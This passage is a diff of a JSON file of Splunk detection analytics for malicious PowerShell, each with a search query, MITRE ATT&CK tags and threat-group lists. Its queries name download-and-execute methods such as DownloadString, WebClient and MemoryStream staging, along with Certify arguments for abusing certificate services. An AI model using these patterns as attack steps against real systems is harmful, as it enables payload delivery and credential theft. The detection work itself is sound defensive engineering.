datamodel=Endpoint.Processes where Processes.process_name=powershell.exe by Processes.user Processes.process_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| search (process=*-EncodedCommand* OR process=*-enc*) process=*-Exec* | `suspicious_powershell_command_line_arguments_filter`", - "tags": { - "name": "Suspicious Powershell Command-Line Arguments", - "analytic_story": [ - "Malicious PowerShell", - "Hermetic Wiper", - "CISA AA22-320A" - ], - "asset_type": "Endpoint", - "cis20": [ - "CIS 10" - ], - "kill_chain_phases": [ - "Installation" - ], - "message": "tbd", - "mitre_attack_id": [ - "T1059.001" - ], - "nist": [ - "DE.CM" - ], - "observable": [ - { - "name": "field", - "type": "Unknown", - "role": [ - "Unknown" - ] - } - ], - "risk_score": 25, - "security_domain": "endpoint", - "risk_severity": "low", - "mitre_attack_enrichments": [ - { - "mitre_attack_id": "T1059.001", - "mitre_attack_technique": "PowerShell", - "mitre_attack_tactics": [ - "Execution" - ], - "mitre_attack_groups": [ - "APT19", - "APT28", "APT29", "APT3", "APT32", "APT33", + "APT37", "APT38", "APT39", "APT41", + "Ajax Security Team", + "Andariel", "Aquatic Panda", + "BITTER", "BRONZE BUTLER", - "Blue Mockingbird", + "BackdoorDiplomacy", "Chimera", "Cobalt Group", "Confucius", - "CopyKittens", - "DarkHydrus", - "DarkVishnya", - "Deep Panda", + "Darkhotel", "Dragonfly", - "Earth Lusca", + "Elderwood", "Ember Bear", - "FIN10", - "FIN6", + "Evilnum", "FIN7", "FIN8", "Fox Kitten", "GALLIUM", - "GOLD SOUTHFIELD", - "Gallmaker", "Gamaredon Group", "Gorgon Group", "HAFNIUM", "HEXANE", - "Inception", + "IndigoZebra", "Indrik Spider", + "Ke3chang", "Kimsuky", "Lazarus Group", "LazyScripter", "Leviathan", + "LuminousMoth", "Magic Hound", + "Metador", "Molerats", + "Moses Staff", "MuddyWater", "Mustang Panda", "Nomadic Octopus", "OilRig", + "PLATINUM", "Patchwork", - "Poseidon Group", + "Rancor", + "Rocke", "Sandworm Team", + "SideCopy", "Sidewinder", "Silence", - "Stealth Falcon", - "TA459", "TA505", - "TEMP.Veles", + "TA551", "TeamTNT", "Threat Group-3390", - "Thrip", "Tonto Team", + "Tropic Trooper", "Turla", + "Volatile Cedar", "WIRTE", - "Wizard Spider", + "Whitefly", + "Windshift", + "Winnti Group", + "ZIRCONIUM", "menuPass" ] } @@ -457755,18 +462835,19 @@ } }, { - "name": "Any Powershell DownloadFile", - "description": "The following analytic identifies the use of PowerShell downloading a file using `DownloadFile` method. This particular method is utilized in many different PowerShell frameworks to download files and output to disk. Identify the source (IP/domain) and destination file and triage appropriately. If AMSI logging or PowerShell transaction logs are available, review for further details of the implant.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` Processes.process=*DownloadFile* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| `any_powershell_downloadfile_filter`", + "name": "Any Powershell DownloadString", + "description": "The following analytic identifies the use of PowerShell downloading a file using `DownloadString` method. This particular method is utilized in many different PowerShell frameworks to download files and output to disk. Identify the source (IP/domain) and destination file and triage appropriately. If AMSI logging or PowerShell transaction logs are available, review for further details of the implant.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` Processes.process=*.DownloadString* by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| `any_powershell_downloadstring_filter`", "tags": { - "name": "Any Powershell DownloadFile", + "name": "Any Powershell DownloadString", "analytic_story": [ - "DarkCrystal RAT", + "Winter Vivern", "Ingress Tool Transfer", "Hermetic Wiper", "Malicious PowerShell", + "HAFNIUM Group", "Data Destruction", - "Log4Shell CVE-2021-44228" + "IcedID" ], "asset_type": "Endpoint", "cis20": [ @@ -457776,7 +462857,7 @@ "Installation", "Command And Control" ], - "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$. This behavior identifies the use of DownloadFile within PowerShell.", + "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$. This behavior identifies the use of DownloadString within PowerShell.", "mitre_attack_id": [ "T1059", "T1059.001", @@ -457998,45 +463079,33 @@ } }, { - "name": "Any Powershell DownloadString", - "description": "The following analytic identifies the use of PowerShell downloading a file using `DownloadString` method. This particular method is utilized in many different PowerShell frameworks to download files and output to disk. Identify the source (IP/domain) and destination file and triage appropriately. If AMSI logging or PowerShell transaction logs are available, review for further details of the implant.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` Processes.process=*.DownloadString* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| `any_powershell_downloadstring_filter`", + "name": "Detect Certify With PowerShell Script Block Logging", + "description": "The following analytic identifies when the attacker tool Certify is used through an in-memory PowerShell function to enumerate Active Directory Certificate Services (AD CS) environments. The default command line arguments for the binary version of this tools are similar to PowerShell calls and perform near identical enumeration or exploitation functions.", + "search": "`powershell` EventCode=4104 (ScriptBlockText IN (\"*find *\") AND ScriptBlockText IN (\"* /vulnerable*\",\"* -vulnerable*\",\"* /enrolleeSuppliesSubject *\",\"* /json /outfile*\")) OR (ScriptBlockText IN (,\"*auth *\",\"*req *\",) AND ScriptBlockText IN (\"* -ca *\",\"* -username *\",\"* -u *\")) OR (ScriptBlockText IN (\"*request *\",\"*download *\") AND ScriptBlockText IN (\"* /ca:*\")) | stats count min(_time) as firstTime max(_time) as lastTime list(ScriptBlockText) as command Values(OpCode) as reason values(Path) as file_name values(UserID) as user by _time Computer EventCode | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | eval file_name = case(isnotnull(file_name),file_name,true(),\"unknown\") | eval signature = substr(command,0,256) | rename Computer as dest,EventCode as signature_id | `detect_certify_with_powershell_script_block_logging_filter`", "tags": { - "name": "Any Powershell DownloadString", + "name": "Detect Certify With PowerShell Script Block Logging", "analytic_story": [ - "Winter Vivern", - "Ingress Tool Transfer", - "Hermetic Wiper", - "Malicious PowerShell", - "HAFNIUM Group", - "Data Destruction", - "IcedID" + "Windows Certificate Services", + "Malicious PowerShell" ], "asset_type": "Endpoint", "cis20": [ "CIS 10" ], "kill_chain_phases": [ - "Installation", - "Command And Control" + "Exploitation", + "Installation" ], - "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$. This behavior identifies the use of DownloadString within PowerShell.", + "message": "Certify arguments through PowerShell detected on $dest$.", "mitre_attack_id": [ + "T1649", "T1059", - "T1059.001", - "T1105" + "T1059.001" ], "nist": [ "DE.CM" ], "observable": [ - { - "name": "user", - "type": "User", - "role": [ - "Victim" - ] - }, { "name": "dest", "type": "Hostname", @@ -458045,24 +463114,34 @@ ] }, { - "name": "parent_process_name", - "type": "Process", + "name": "user", + "type": "User Name", "role": [ - "Parent Process" + "Victim" ] }, { - "name": "process_name", + "name": "command", "type": "Process", "role": [ - "Child Process" + "Attacker" ] } ], - "risk_score": 56, + "risk_score": 90, "security_domain": "endpoint", - "risk_severity": "medium", + "risk_severity": "high", "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1649", + "mitre_attack_technique": "Steal or Forge Authentication Certificates", + "mitre_attack_tactics": [ + "Credential Access" + ], + "mitre_attack_groups": [ + "APT29" + ] + }, { "mitre_attack_id": "T1059", "mitre_attack_technique": "Command and Scripting Interpreter", @@ -458157,86 +463236,6 @@ "Wizard Spider", "menuPass" ] - }, - { - "mitre_attack_id": "T1105", - "mitre_attack_technique": "Ingress Tool Transfer", - "mitre_attack_tactics": [ - "Command And Control" - ], - "mitre_attack_groups": [ - "APT-C-36", - "APT18", - "APT28", - "APT29", - "APT3", - "APT32", - "APT33", - "APT37", - "APT38", - "APT39", - "APT41", - "Ajax Security Team", - "Andariel", - "Aquatic Panda", - "BITTER", - "BRONZE BUTLER", - "BackdoorDiplomacy", - "Chimera", - "Cobalt Group", - "Confucius", - "Darkhotel", - "Dragonfly", - "Elderwood", - "Ember Bear", - "Evilnum", - "FIN7", - "FIN8", - "Fox Kitten", - "GALLIUM", - "Gamaredon Group", - "Gorgon Group", - "HAFNIUM", - "HEXANE", - "IndigoZebra", - "Indrik Spider", - "Ke3chang", - "Kimsuky", - "Lazarus Group", - "LazyScripter", - "Leviathan", - "LuminousMoth", - "Magic Hound", - "Metador", - "Molerats", - "Moses Staff", - "MuddyWater", - "Mustang Panda", - "Nomadic Octopus", - "OilRig", - "PLATINUM", - "Patchwork", - "Rancor", - "Rocke", - "Sandworm Team", - "SideCopy", - "Sidewinder", - "Silence", - "TA505", - "TA551", - "TeamTNT", - "Threat Group-3390", - "Tonto Team", - "Tropic Trooper", - "Turla", - "Volatile Cedar", - "WIRTE", - "Whitefly", - "Windshift", - "Winnti Group", - "ZIRCONIUM", - "menuPass" - ] } ] } @@ -458531,7 +463530,7 @@ { "name": "Exchange PowerShell Module Usage", "description": "The following analytic identifies the usage of Exchange PowerShell modules that were recently used for a proof of concept related to ProxyShell. Adversaries may abuse a limited set of PwSh Modules related to Exchange once gained access via ProxyShell or ProxyNotShell.\\\nInherently, the usage of the modules is not malicious, but reviewing parallel processes, and user, of the session will assist with determining the intent. \\\nModule - New-MailboxExportRequest will begin the process of exporting contents of a primary mailbox or archive to a .pst file. \\\nModule - New-managementroleassignment can assign a management role to a management role group, management role assignment policy, user, or universal security group (USG). \\\nModule - New-MailboxSearch cmdlet to create a mailbox search and either get an estimate of search results, place search results on In-Place Hold or copy them to a Discovery mailbox. You can also place all contents in a mailbox on hold by not specifying a search query, which accomplishes similar results as Litigation Hold. \\ Module - Get-Recipient cmdlet to view existing recipient objects in your organization. This cmdlet returns all mail-enabled objects (for example, mailboxes, mail users, mail contacts, and distribution groups).", - "search": "`powershell` EventCode=4104 ScriptBlockText IN (\"*New-MailboxExportRequest*\", \"*New-ManagementRoleAssignment*\", \"*New-MailboxSearch*\", \"*Get-Recipient*\", \"Search-Mailbox\") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `exchange_powershell_module_usage_filter`", + "search": "`powershell` EventCode=4104 ScriptBlockText IN (\"*New-MailboxExportRequest*\", \"*New-ManagementRoleAssignment*\", \"*New-MailboxSearch*\", \"*Get-Recipient*\", \"Search-Mailbox\") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | rename Computer as dest |rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `exchange_powershell_module_usage_filter`", "tags": { "name": "Exchange PowerShell Module Usage", "analytic_story": [ @@ -458670,7 +463669,7 @@ { "name": "Get-ForestTrust with PowerShell Script Block", "description": "The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \\\nThis analytic identifies Get-ForestTrust from PowerSploit in order to gather domain trust information. \\\nDuring triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block.", - "search": "`powershell` EventCode=4104 ScriptBlockText = \"*get-foresttrust*\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_foresttrust_with_powershell_script_block_filter`", + "search": "`powershell` EventCode=4104 ScriptBlockText = \"*get-foresttrust*\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_foresttrust_with_powershell_script_block_filter`", "tags": { "name": "Get-ForestTrust with PowerShell Script Block", "analytic_story": [ @@ -458684,7 +463683,7 @@ "Exploitation", "Installation" ], - "message": "Suspicious PowerShell Get-ForestTrust was identified on endpoint $Computer$ by user $UserID$.", + "message": "Suspicious PowerShell Get-ForestTrust was identified on endpoint $dest$ by user $user$.", "mitre_attack_id": [ "T1482", "T1059.001" @@ -458694,14 +463693,14 @@ ], "observable": [ { - "name": "UserID", + "name": "user", "type": "User", "role": [ "Victim" ] }, { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" @@ -459785,7 +464784,8 @@ "analytic_story": [ "Malicious PowerShell", "Hermetic Wiper", - "Data Destruction" + "Data Destruction", + "Flax Typhoon" ], "asset_type": "Endpoint", "cis20": [ @@ -460435,7 +465435,7 @@ { "name": "PowerShell Domain Enumeration", "description": "The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \\\nThis analytic identifies specific PowerShell modules typically used to enumerate an organizations domain or users. \\\nDuring triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block.", - "search": "`powershell` EventCode=4104 ScriptBlockText IN (*get-netdomaintrust*, *get-netforesttrust*, *get-addomain*, *get-adgroupmember*, *get-domainuser*) | stats count min(_time) as firstTime max(_time) as lastTime by Computer EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_domain_enumeration_filter`", + "search": "`powershell` EventCode=4104 ScriptBlockText IN (*get-netdomaintrust*, *get-netforesttrust*, *get-addomain*, *get-adgroupmember*, *get-domainuser*) | stats count min(_time) as firstTime max(_time) as lastTime by Computer EventCode ScriptBlockText UserID | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_domain_enumeration_filter`", "tags": { "name": "PowerShell Domain Enumeration", "analytic_story": [ @@ -460450,7 +465450,7 @@ "kill_chain_phases": [ "Installation" ], - "message": "A suspicious powershell script contains domain enumeration command in $ScriptBlockText$ with EventCode $EventCode$ in host $Computer$", + "message": "A suspicious powershell script contains domain enumeration command in $ScriptBlockText$ with EventCode $EventCode$ in host $dest$", "mitre_attack_id": [ "T1059", "T1059.001" @@ -460460,14 +465460,14 @@ ], "observable": [ { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" ] }, { - "name": "UserID", + "name": "user", "type": "User", "role": [ "Victim" @@ -461641,13 +466641,341 @@ } }, { - "name": "PowerShell Start or Stop Service", - "description": "This analytic identifies the use of PowerShell's Start-Service or Stop-Service cmdlets on an endpoint. These cmdlets allow users to start or stop a specified Windows service. The ability to manipulate services can be leveraged by attackers to disable or stop critical services, which can cause system instability or disrupt business operations. By detecting the use of Start-Service or Stop-Service cmdlets via PowerShell, this analytic can help organizations identify potential malicious activity related to attackers attempting to manipulate services on compromised systems. However, note that this behavior may be noisy, as these cmdlets are commonly used by system administrators or other legitimate users to manage services. Therefore, it is recommended not to enable this analytic as a direct notable or TTP. Instead, it should be used as part of a broader set of security controls to detect and investigate potential threats.", - "search": "`powershell` EventCode=4104 ScriptBlockText IN (\"*start-service*\", \"*stop-service*\") | stats count min(_time) as firstTime max(_time) as lastTime by Computer EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_start_or_stop_service_filter`", + "name": "PowerShell Script Block With URL Chain", + "description": "The following analytic identifies a suspicious PowerShell script execution via EventCode 4104 that contains multiple URLs within a function or array. This is typically found in obfuscated PowerShell or PowerShell executing embedded .NET or binary files that are attempting to download 2nd stage payloads. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts.", + "search": "`powershell` EventCode=4104 ScriptBlockText IN (\"*http:*\",\"*https:*\") | regex ScriptBlockText=\"(\\\"?(https?:\\/\\/(?:www\\.)?[-a-zA-Z0-9@:%._\\+~#=]{1,256}\\.[a-zA-Z0-9()]{1,6}\\b(?:[-a-zA-Z0-9()@:%_\\+.~#?&\\/=]*))\\\"?(?:,|\\))?){2,}\" | rex max_match=20 field=ScriptBlockText \"(?https?:\\/\\/(?:www\\.)?[-a-zA-Z0-9@:%._\\+~#=]{1,256}\\.[a-zA-Z0-9()]{1,6}\\b(?:[-a-zA-Z0-9()@:%_\\+.~#?&\\/=]*))\" | eval Path = case(isnotnull(Path),Path,true(),\"unknown\") | stats count min(_time) as firstTime max(_time) as lastTime list(ScriptBlockText) as command values(Path) as file_name values(UserID) as user values(url) as url dc(url) as url_count by ActivityID, Computer, EventCode | rename Computer as dest, EventCode as signature_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_script_block_with_url_chain_filter`", + "tags": { + "name": "PowerShell Script Block With URL Chain", + "analytic_story": [ + "Malicious PowerShell" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Installation", + "Command And Control" + ], + "message": "A suspicious powershell script used by $user$ on host $dest$ contains $url_count$ URLs in an array, this is commonly used for malware.", + "mitre_attack_id": [ + "T1059.001", + "T1105" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "dest", + "type": "Endpoint", + "role": [ + "Victim" + ] + }, + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + }, + { + "name": "file_name", + "type": "File Name", + "role": [ + "Attacker" + ] + }, + { + "name": "url", + "type": "URL String", + "role": [ + "Attacker" + ] + } + ], + "risk_score": 80, + "security_domain": "endpoint", + "risk_severity": "high", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1059.001", + "mitre_attack_technique": "PowerShell", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "APT19", + "APT28", + "APT29", + "APT3", + "APT32", + "APT33", + "APT38", + "APT39", + "APT41", + "Aquatic Panda", + "BRONZE BUTLER", + "Blue Mockingbird", + "Chimera", + "Cobalt Group", + "Confucius", + "CopyKittens", + "DarkHydrus", + "DarkVishnya", + "Deep Panda", + "Dragonfly", + "Earth Lusca", + "Ember Bear", + "FIN10", + "FIN6", + "FIN7", + "FIN8", + "Fox Kitten", + "GALLIUM", + "GOLD SOUTHFIELD", + "Gallmaker", + "Gamaredon Group", + "Gorgon Group", + "HAFNIUM", + "HEXANE", + "Inception", + "Indrik Spider", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "Leviathan", + "Magic Hound", + "Molerats", + "MuddyWater", + "Mustang Panda", + "Nomadic Octopus", + "OilRig", + "Patchwork", + "Poseidon Group", + "Sandworm Team", + "Sidewinder", + "Silence", + "Stealth Falcon", + "TA459", + "TA505", + "TEMP.Veles", + "TeamTNT", + "Threat Group-3390", + "Thrip", + "Tonto Team", + "Turla", + "WIRTE", + "Wizard Spider", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1105", + "mitre_attack_technique": "Ingress Tool Transfer", + "mitre_attack_tactics": [ + "Command And Control" + ], + "mitre_attack_groups": [ + "APT-C-36", + "APT18", + "APT28", + "APT29", + "APT3", + "APT32", + "APT33", + "APT37", + "APT38", + "APT39", + "APT41", + "Ajax Security Team", + "Andariel", + "Aquatic Panda", + "BITTER", + "BRONZE BUTLER", + "BackdoorDiplomacy", + "Chimera", + "Cobalt Group", + "Confucius", + "Darkhotel", + "Dragonfly", + "Elderwood", + "Ember Bear", + "Evilnum", + "FIN7", + "FIN8", + "Fox Kitten", + "GALLIUM", + "Gamaredon Group", + "Gorgon Group", + "HAFNIUM", + "HEXANE", + "IndigoZebra", + "Indrik Spider", + "Ke3chang", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "Leviathan", + "LuminousMoth", + "Magic Hound", + "Metador", + "Molerats", + "Moses Staff", + "MuddyWater", + "Mustang Panda", + "Nomadic Octopus", + "OilRig", + "PLATINUM", + "Patchwork", + "Rancor", + "Rocke", + "Sandworm Team", + "SideCopy", + "Sidewinder", + "Silence", + "TA505", + "TA551", + "TeamTNT", + "Threat Group-3390", + "Tonto Team", + "Tropic Trooper", + "Turla", + "Volatile Cedar", + "WIRTE", + "Whitefly", + "Windshift", + "Winnti Group", + "ZIRCONIUM", + "menuPass" + ] + } + ] + } + }, + { + "name": "PowerShell Start or Stop Service", + "description": "This analytic identifies the use of PowerShell's Start-Service or Stop-Service cmdlets on an endpoint. These cmdlets allow users to start or stop a specified Windows service. The ability to manipulate services can be leveraged by attackers to disable or stop critical services, which can cause system instability or disrupt business operations. By detecting the use of Start-Service or Stop-Service cmdlets via PowerShell, this analytic can help organizations identify potential malicious activity related to attackers attempting to manipulate services on compromised systems. However, note that this behavior may be noisy, as these cmdlets are commonly used by system administrators or other legitimate users to manage services. Therefore, it is recommended not to enable this analytic as a direct notable or TTP. Instead, it should be used as part of a broader set of security controls to detect and investigate potential threats.", + "search": "`powershell` EventCode=4104 ScriptBlockText IN (\"*start-service*\", \"*stop-service*\") | stats count min(_time) as firstTime max(_time) as lastTime by Computer EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_start_or_stop_service_filter`", + "tags": { + "name": "PowerShell Start or Stop Service", + "analytic_story": [ + "Active Directory Lateral Movement" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Installation" + ], + "message": "PowerShell was identified attempting to start or stop a service on $Computer$.", + "mitre_attack_id": [ + "T1059.001" + ], + "nist": [ + "DE.AE" + ], + "observable": [ + { + "name": "Computer", + "type": "Hostname", + "role": [ + "Victim" + ] + } + ], + "risk_score": 10, + "security_domain": "endpoint", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1059.001", + "mitre_attack_technique": "PowerShell", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "APT19", + "APT28", + "APT29", + "APT3", + "APT32", + "APT33", + "APT38", + "APT39", + "APT41", + "Aquatic Panda", + "BRONZE BUTLER", + "Blue Mockingbird", + "Chimera", + "Cobalt Group", + "Confucius", + "CopyKittens", + "DarkHydrus", + "DarkVishnya", + "Deep Panda", + "Dragonfly", + "Earth Lusca", + "Ember Bear", + "FIN10", + "FIN6", + "FIN7", + "FIN8", + "Fox Kitten", + "GALLIUM", + "GOLD SOUTHFIELD", + "Gallmaker", + "Gamaredon Group", + "Gorgon Group", + "HAFNIUM", + "HEXANE", + "Inception", + "Indrik Spider", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "Leviathan", + "Magic Hound", + "Molerats", + "MuddyWater", + "Mustang Panda", + "Nomadic Octopus", + "OilRig", + "Patchwork", + "Poseidon Group", + "Sandworm Team", + "Sidewinder", + "Silence", + "Stealth Falcon", + "TA459", + "TA505", + "TEMP.Veles", + "TeamTNT", + "Threat Group-3390", + "Thrip", + "Tonto Team", + "Turla", + "WIRTE", + "Wizard Spider", + "menuPass" + ] + } + ] + } + }, + { + "name": "Powershell Using memory As Backing Store", + "description": "The following analytic identifies suspicious PowerShell script execution via EventCode 4104 that is using memory stream as new object backstore. The malicious PowerShell script will contain stream flate data and will be decompressed in memory to run or drop the actual payload. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts.", + "search": "`powershell` EventCode=4104 ScriptBlockText = *New-Object* ScriptBlockText = *IO.MemoryStream* | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_using_memory_as_backing_store_filter`", "tags": { - "name": "PowerShell Start or Stop Service", + "name": "Powershell Using memory As Backing Store", "analytic_story": [ - "Active Directory Lateral Movement" + "Malicious PowerShell", + "Hermetic Wiper", + "Data Destruction", + "IcedID" ], "asset_type": "Endpoint", "cis20": [ @@ -461656,23 +466984,31 @@ "kill_chain_phases": [ "Installation" ], - "message": "PowerShell was identified attempting to start or stop a service on $Computer$.", + "message": "A PowerShell script contains memorystream command in $ScriptBlockText$ as new object backstore with EventCode $EventCode$ on host $dest$.", "mitre_attack_id": [ - "T1059.001" + "T1059.001", + "T1059" ], "nist": [ - "DE.AE" + "DE.CM" ], "observable": [ { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" ] + }, + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] } ], - "risk_score": 10, + "risk_score": 40, "security_domain": "endpoint", "risk_severity": "low", "mitre_attack_enrichments": [ @@ -461747,56 +467083,86 @@ "Wizard Spider", "menuPass" ] + }, + { + "mitre_attack_id": "T1059", + "mitre_attack_technique": "Command and Scripting Interpreter", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "APT19", + "APT32", + "APT37", + "APT39", + "Dragonfly", + "FIN5", + "FIN6", + "FIN7", + "Fox Kitten", + "Ke3chang", + "OilRig", + "Stealth Falcon", + "Whitefly", + "Windigo" + ] } ] } }, { - "name": "Powershell Using memory As Backing Store", - "description": "The following analytic identifies suspicious PowerShell script execution via EventCode 4104 that is using memory stream as new object backstore. The malicious PowerShell script will contain stream flate data and will be decompressed in memory to run or drop the actual payload. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts.", - "search": "`powershell` EventCode=4104 ScriptBlockText = *New-Object* ScriptBlockText = *IO.MemoryStream* | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_using_memory_as_backing_store_filter`", + "name": "PowerShell WebRequest Using Memory Stream", + "description": "This analytic identifies a common fileless malware staging technique of using .NET classes to directly download a URL payload into memory. The analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution.", + "search": "`powershell` EventCode=4104 ScriptBlockText IN (\"*system.net.webclient*\",\"*system.net.webrequest*\") AND ScriptBlockText=\"*IO.MemoryStream*\" | eval Path = case(isnotnull(Path),Path,true(),\"unknown\") | stats count min(_time) as firstTime max(_time) as lastTime list(ScriptBlockText) as command values(Path) as file_name values(UserID) as user by ActivityID, Computer, EventCode | rename Computer as dest, EventCode as signature_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_webrequest_using_memory_stream_filter`", "tags": { - "name": "Powershell Using memory As Backing Store", + "name": "PowerShell WebRequest Using Memory Stream", "analytic_story": [ - "Malicious PowerShell", - "Hermetic Wiper", - "Data Destruction", - "IcedID" + "Malicious PowerShell" ], "asset_type": "Endpoint", "cis20": [ "CIS 10" ], "kill_chain_phases": [ - "Installation" + "Installation", + "Command And Control", + "Exploitation" ], - "message": "A PowerShell script contains memorystream command in $ScriptBlockText$ as new object backstore with EventCode $EventCode$ on host $Computer$.", + "message": "Powershell webrequest to memory stream behavior. Possible fileless malware staging on $dest$ by $user$.", "mitre_attack_id": [ "T1059.001", - "T1059" + "T1105", + "T1027.011" ], "nist": [ "DE.CM" ], "observable": [ { - "name": "Computer", - "type": "Hostname", + "name": "dest", + "type": "Endpoint", "role": [ "Victim" ] }, { - "name": "UserID", + "name": "user", "type": "User", "role": [ "Victim" ] + }, + { + "name": "file_name", + "type": "File Name", + "role": [ + "Attacker" + ] } ], - "risk_score": 40, + "risk_score": 80, "security_domain": "endpoint", - "risk_severity": "low", + "risk_severity": "high", "mitre_attack_enrichments": [ { "mitre_attack_id": "T1059.001", @@ -461871,26 +467237,94 @@ ] }, { - "mitre_attack_id": "T1059", - "mitre_attack_technique": "Command and Scripting Interpreter", + "mitre_attack_id": "T1105", + "mitre_attack_technique": "Ingress Tool Transfer", "mitre_attack_tactics": [ - "Execution" + "Command And Control" ], "mitre_attack_groups": [ - "APT19", + "APT-C-36", + "APT18", + "APT28", + "APT29", + "APT3", "APT32", + "APT33", "APT37", + "APT38", "APT39", + "APT41", + "Ajax Security Team", + "Andariel", + "Aquatic Panda", + "BITTER", + "BRONZE BUTLER", + "BackdoorDiplomacy", + "Chimera", + "Cobalt Group", + "Confucius", + "Darkhotel", "Dragonfly", - "FIN5", - "FIN6", + "Elderwood", + "Ember Bear", + "Evilnum", "FIN7", + "FIN8", "Fox Kitten", + "GALLIUM", + "Gamaredon Group", + "Gorgon Group", + "HAFNIUM", + "HEXANE", + "IndigoZebra", + "Indrik Spider", "Ke3chang", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "Leviathan", + "LuminousMoth", + "Magic Hound", + "Metador", + "Molerats", + "Moses Staff", + "MuddyWater", + "Mustang Panda", + "Nomadic Octopus", "OilRig", - "Stealth Falcon", + "PLATINUM", + "Patchwork", + "Rancor", + "Rocke", + "Sandworm Team", + "SideCopy", + "Sidewinder", + "Silence", + "TA505", + "TA551", + "TeamTNT", + "Threat Group-3390", + "Tonto Team", + "Tropic Trooper", + "Turla", + "Volatile Cedar", + "WIRTE", "Whitefly", - "Windigo" + "Windshift", + "Winnti Group", + "ZIRCONIUM", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1027.011", + "mitre_attack_technique": "Fileless Storage", + "mitre_attack_tactics": [ + "Defense Evasion" + ], + "mitre_attack_groups": [ + "APT32", + "Turla" ] } ] @@ -462463,13 +467897,155 @@ } }, { - "name": "Windows Powershell Cryptography Namespace", - "description": "The following analytic identifies suspicious PowerShell script execution via EventCode 4104 that is processing cryptography namespace library. This technique was seen in several powershell malware, loader, downloader and stager that will decrypt or decode the next malicious stager or the actual payload. This 